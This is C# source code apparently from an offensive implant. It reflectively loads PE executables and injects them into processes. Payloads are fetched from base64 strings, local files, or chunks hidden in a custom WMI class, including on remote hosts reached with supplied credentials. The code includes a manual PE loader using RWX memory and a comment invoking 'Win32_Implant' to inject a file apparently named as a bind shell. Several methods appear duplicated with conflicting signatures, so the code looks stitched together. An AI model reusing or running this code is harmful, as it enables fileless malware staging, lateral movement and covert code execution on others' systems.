public static string InjectPeString(Int32 processId, string peString, string parameters)
{
string output = "";
PELoader peLoader = new PELoader(System.Convert.FromBase64String(peString));
//byte[] peBytes = System.Convert.FromBase64String(peString);
//PELoader peLoader = new PELoader(peBytes);
InjectPE injectPE = new InjectPE(peLoader, parameters);
output += injectPE.GetOutput();
return(output);
}
public static void InjectPEWMIFS(String processId, String wmiClass, String fileName, String parameters)
{
using (PELoader peLoader = new PELoader())
{
if (!peLoader.Execute(Misc.QueryWMIFS(wmiClass, fileName)))
{
Console.WriteLine("PELoader Failed");
return;
}
_InjectPE(processId, peLoader, parameters);
}
}
public static void InjectPEString(String processId, String peString, String parameters)
{
using (PELoader peLoader = new PELoader())
{
if (!peLoader.Execute(Convert.FromBase64String(peString)))
{
Console.WriteLine("PELoader Failed");
return;
}
_InjectPE(processId, peLoader, parameters);
}
}
public static string InjectPeWMIFS(Int32 processId, string wmiClass, string fileName, string parameters)
{
string output = "";
ConnectionOptions options = new ConnectionOptions();
options.Impersonation = System.Management.ImpersonationLevel.Impersonate;
ManagementScope scope = new ManagementScope("\\\\.\\root\\cimv2", options);
scope.Connect();
ObjectQuery queryIndexCount = new ObjectQuery("SELECT Index FROM WMIFS WHERE FileName = \'" + fileName + "\'");
ManagementObjectSearcher searcherIndexCount = new ManagementObjectSearcher(scope, queryIndexCount);
ManagementObjectCollection queryIndexCollection = searcherIndexCount.Get();
int indexCount = queryIndexCollection.Count;
String EncodedText = "";
for (int i = 0; i < indexCount; i++)
{
ObjectQuery queryFilePart = new ObjectQuery("SELECT FileStore FROM WMIFS WHERE FileName = \'" + fileName + "\' AND Index = \'" + i + "\'");
ManagementObjectSearcher searcherFilePart = new ManagementObjectSearcher(scope, queryFilePart);
ManagementObjectCollection queryCollection = searcherFilePart.Get();
foreach (ManagementObject filePart in queryCollection)
{
EncodedText += filePart["FileStore"].ToString();
}
}
byte[] peBytes = System.Convert.FromBase64String(EncodedText);
PELoader peLoader = new PELoader(peBytes);
InjectPERemote injectPE = new InjectPERemote((UInt32)processId, peLoader, parameters);
try
{
injectPE.execute();
}
catch
{
output = "[-] Execution Failed\n";
}
finally
{
output += injectPE.GetOutput();
}
return(output);
}
public static void InjectPEWMIFSRemote(String processId, String wmiClass, String system, String username, String password, String fileName, String parameters)
{
var options = new ConnectionOptions();
options.Username = username;
options.Password = password;
var scope = new ManagementScope("\\\\" + system + "\\root\\cimv2", options);
scope.Connect();
var queryIndexCount = new ObjectQuery("SELECT Index FROM WMIFS WHERE FileName = \'" + fileName + "\'");
var searcherIndexCount = new ManagementObjectSearcher(scope, queryIndexCount);
ManagementObjectCollection queryIndexCollection = searcherIndexCount.Get();
Int32 indexCount = queryIndexCollection.Count;
String EncodedText = "";
for (Int32 i = 0; i < indexCount; i++)
{
var queryFilePart = new ObjectQuery("SELECT FileStore FROM WMIFS WHERE FileName = \'" + fileName + "\' AND Index = \'" + i + "\'");
var searcherFilePart = new ManagementObjectSearcher(scope, queryFilePart);
ManagementObjectCollection queryCollection = searcherFilePart.Get();
foreach (ManagementObject filePart in queryCollection)
{
EncodedText += filePart["FileStore"].ToString();
}
}
Byte[] peBytes = Convert.FromBase64String(EncodedText);
using (PELoader peLoader = new PELoader())
{
if (!peLoader.Execute(peBytes))
{
Console.WriteLine("PELoader Failed");
return;
}
_InjectPE(processId, peLoader, parameters);
}
}
public static string InjectPeFile(Int32 processId, string fileName, string parameters)
{
//Invoke-CimMethod -ClassName Win32_Implant -Name InjectPeFromFileRemote -Arguments @{processId=5648; fileName="C:\bind64.exe"; parameters=""}
PELoader peLoader = new PELoader(fileName);
InjectPERemote injectPE = injectPE = new InjectPERemote((UInt32)processId, peLoader, parameters);
string output = "";
try
{
injectPE.execute();
}
catch
{
output = "[-] Execution Failed\n";
}
finally
{
output += injectPE.GetOutput();
}
return(output);
}
private static void _InjectPE(String processId, PELoader peLoader, String parameters)
{
Console.WriteLine("\n");
try
{
if (!Int32.TryParse(processId, out Int32 dwProcessId))
{
var injectPE = new InjectPE(peLoader, parameters);
}
else
{
var injectPE = new InjectPERemote((UInt32)dwProcessId, peLoader, parameters);
try
{
using (var tokens = new Tokens())
{
injectPE.Execute();
}
}
catch (Exception ex)
{
Console.WriteLine("[-] {0}", ex.Message);
}
}
}
catch (FormatException ex)
{
Console.WriteLine("[-] Unable to Parse Process ID");
Console.WriteLine("[-] {0}", ex.Message);
}
catch (Exception ex)
{
Console.WriteLine("[-] Unhandled Exception Occured");
Console.WriteLine("[-] {0}", ex.Message);
}
}
internal InjectPE(PELoader peLoader, String parameters)
{
////////////////////////////////////////////////////////////////////////////////
IntPtr lpAddress = IntPtr.Zero;
UInt32 dwSize = peLoader.sizeOfImage;
IntPtr lpBaseAddress = kernel32.VirtualAlloc(lpAddress, dwSize, kernel32.MEM_COMMIT, Winnt.MEMORY_PROTECTION_CONSTANTS.PAGE_EXECUTE_READWRITE);
Console.WriteLine("[+] Allocated {0} bytes at 0x{1}", peLoader.sizeOfImage.ToString("X4"), lpBaseAddress.ToString("X4"));
////////////////////////////////////////////////////////////////////////////////
for (Int32 i = 0; i < peLoader.imageFileHeader.NumberOfSections; i++)
{
IntPtr lpBaseAddressSection = new IntPtr(lpBaseAddress.ToInt32() + peLoader.imageSectionHeaders[i].VirtualAddress);
UInt32 dwSizeSection = peLoader.imageSectionHeaders[i].SizeOfRawData;
IntPtr lpAllocatedAddress = kernel32.VirtualAlloc(lpBaseAddressSection, dwSizeSection, kernel32.MEM_COMMIT, Winnt.MEMORY_PROTECTION_CONSTANTS.PAGE_EXECUTE_READWRITE);
Marshal.Copy(peLoader.imageBytes, (Int32)peLoader.imageSectionHeaders[i].PointerToRawData, lpAllocatedAddress, (Int32)peLoader.imageSectionHeaders[i].SizeOfRawData);
Console.WriteLine("[+] Copied {0} to 0x{1}", peLoader.imageSectionHeaders[i].Name, lpAllocatedAddress.ToString("X4"));
}
////////////////////////////////////////////////////////////////////////////////
IntPtr relocationTable = new IntPtr(lpBaseAddress.ToInt32() + peLoader.baseRelocationTableAddress);
Winnt._IMAGE_BASE_RELOCATION relocationEntry = (Winnt._IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(relocationTable, typeof(Winnt._IMAGE_BASE_RELOCATION));
Int32 sizeOfRelocationStruct = Marshal.SizeOf(typeof(Winnt._IMAGE_BASE_RELOCATION));
Int32 sizeofNextBlock = (Int32)relocationEntry.SizeOfBlock;
IntPtr offset = relocationTable;
////////////////////////////////////////////////////////////////////////////////
while (true)
{
Winnt._IMAGE_BASE_RELOCATION relocationNextEntry = new Winnt._IMAGE_BASE_RELOCATION();
IntPtr lpNextRelocationEntry = new IntPtr(relocationTable.ToInt32() + (Int32)sizeofNextBlock);
relocationNextEntry = (Winnt._IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(lpNextRelocationEntry, typeof(Winnt._IMAGE_BASE_RELOCATION));
IntPtr destinationAddress = new IntPtr(lpBaseAddress.ToInt32() + (Int32)relocationEntry.VirtualAdress);
////////////////////////////////////////////////////////////////////////////////
for (Int32 i = 0; i < (Int32)((relocationEntry.SizeOfBlock - sizeOfRelocationStruct) / 2); i++)
{
UInt16 value = (UInt16)Marshal.ReadInt16(offset, 8 + (2 * i));
UInt16 type = (UInt16)(value >> 12);
UInt16 fixup = (UInt16)(value & 0xfff);
switch (type)
{
case 0x0:
break;
case 0xA:
if (peLoader.is64Bit)
{
IntPtr patchAddress = new IntPtr(destinationAddress.ToInt64() + (Int32)fixup);
Int64 originalAddress = Marshal.ReadInt64(patchAddress);
Int64 delta64 = (Int64)(lpBaseAddress.ToInt64() - (Int64)peLoader.imageOptionalHeader64.ImageBase);
Marshal.WriteInt64(patchAddress, originalAddress + delta64);
}
else
{
IntPtr patchAddress = new IntPtr(destinationAddress.ToInt32() + (Int32)fixup);
Int32 originalAddress = Marshal.ReadInt32(patchAddress);
Int32 delta32 = (Int32)(lpBaseAddress.ToInt32() - (Int32)peLoader.imageOptionalHeader32.ImageBase);
Marshal.WriteInt32(patchAddress, originalAddress + delta32);
}
break;
}
}
offset = new IntPtr(relocationTable.ToInt32() + (int)sizeofNextBlock);
sizeofNextBlock += (int)relocationNextEntry.SizeOfBlock;
relocationEntry = relocationNextEntry;
//"The last entry is set to zero (NULL) to indicate the end of the table." - cool
if (0 == relocationNextEntry.SizeOfBlock)
{
break;
}
}
////////////////////////////////////////////////////////////////////////////////
//http://sandsprite.com/CodeStuff/Understanding_imports.html
////////////////////////////////////////////////////////////////////////////////
Int32 sizeOfStruct = Marshal.SizeOf(typeof(_IMAGE_IMPORT_DIRECTORY));
Int32 multiplier = 0;
while (true)
{
UInt32 dwImportTableAddressOffset = (UInt32)((sizeOfStruct * multiplier++) + peLoader.importTableAddress);
IntPtr lpImportAddressTable = new IntPtr(lpBaseAddress.ToInt32() + dwImportTableAddressOffset);
_IMAGE_IMPORT_DIRECTORY imageImportDirectory = (_IMAGE_IMPORT_DIRECTORY)Marshal.PtrToStructure(lpImportAddressTable, typeof(_IMAGE_IMPORT_DIRECTORY));
if (0 == imageImportDirectory.RvaImportAddressTable)
{
break;
}
////////////////////////////////////////////////////////////////////////////////
IntPtr dllNamePTR = new IntPtr(lpBaseAddress.ToInt32() + imageImportDirectory.RvaModuleName);
string dllName = Marshal.PtrToStringAnsi(dllNamePTR);
IntPtr hModule = kernel32.LoadLibrary(dllName);
Console.WriteLine("[+] Loaded {0} at {1}", dllName, hModule.ToString("X4"));
////////////////////////////////////////////////////////////////////////////////
IntPtr lpRvaImportAddressTable = new IntPtr(lpBaseAddress.ToInt32() + imageImportDirectory.RvaImportAddressTable);
while (true)
{
Int32 dwRvaImportAddressTable = Marshal.ReadInt32(lpRvaImportAddressTable);
if (0 == dwRvaImportAddressTable)
{
break;
}
IntPtr lpDllFunctionName = (new IntPtr(lpBaseAddress.ToInt32() + dwRvaImportAddressTable + 2));
string dllFunctionName = Marshal.PtrToStringAnsi(lpDllFunctionName);
IntPtr functionAddress = kernel32.GetProcAddress(hModule, dllFunctionName);
Marshal.WriteInt64(lpRvaImportAddressTable, (Int64)functionAddress);
lpRvaImportAddressTable = new IntPtr(lpRvaImportAddressTable.ToInt32() + 8);
}
}
////////////////////////////////////////////////////////////////////////////////
String parameter = "";
IntPtr lpThreadAttributes = IntPtr.Zero;
UInt32 dwStackSize = 0;
UInt32 dwStartAddress = (UInt32)(lpBaseAddress.ToInt64() + peLoader.addressOfEntryPoint);
IntPtr lpStartAddress = new IntPtr(dwStartAddress);
IntPtr lpParameter = new IntPtr();//Convert.ToInt32(parameter));
UInt32 dwCreationFlags = 0;
UInt32 lpThreadId = 0;
IntPtr hThread = kernel32.CreateThread(lpThreadAttributes, dwStackSize, lpStartAddress, lpParameter, dwCreationFlags, ref lpThreadId);
Console.WriteLine("[+] Created thread 0x{0}", hThread.ToString("X4"));
////////////////////////////////////////////////////////////////////////////////
kernel32.WaitForSingleObject(hThread, 0xFFFFFFFF);
}
public InjectPERemote(UInt32 processId, PELoader peLoaderNew, string parametersNew) : base(processId)
{
peLoader = peLoaderNew;
parameters = parametersNew;
}
internal InjectPERemote(UInt32 processId, PELoader peLoader, String parameters) : base(processId)
{
this.peLoader = peLoader;
this.parameters = parameters;
}
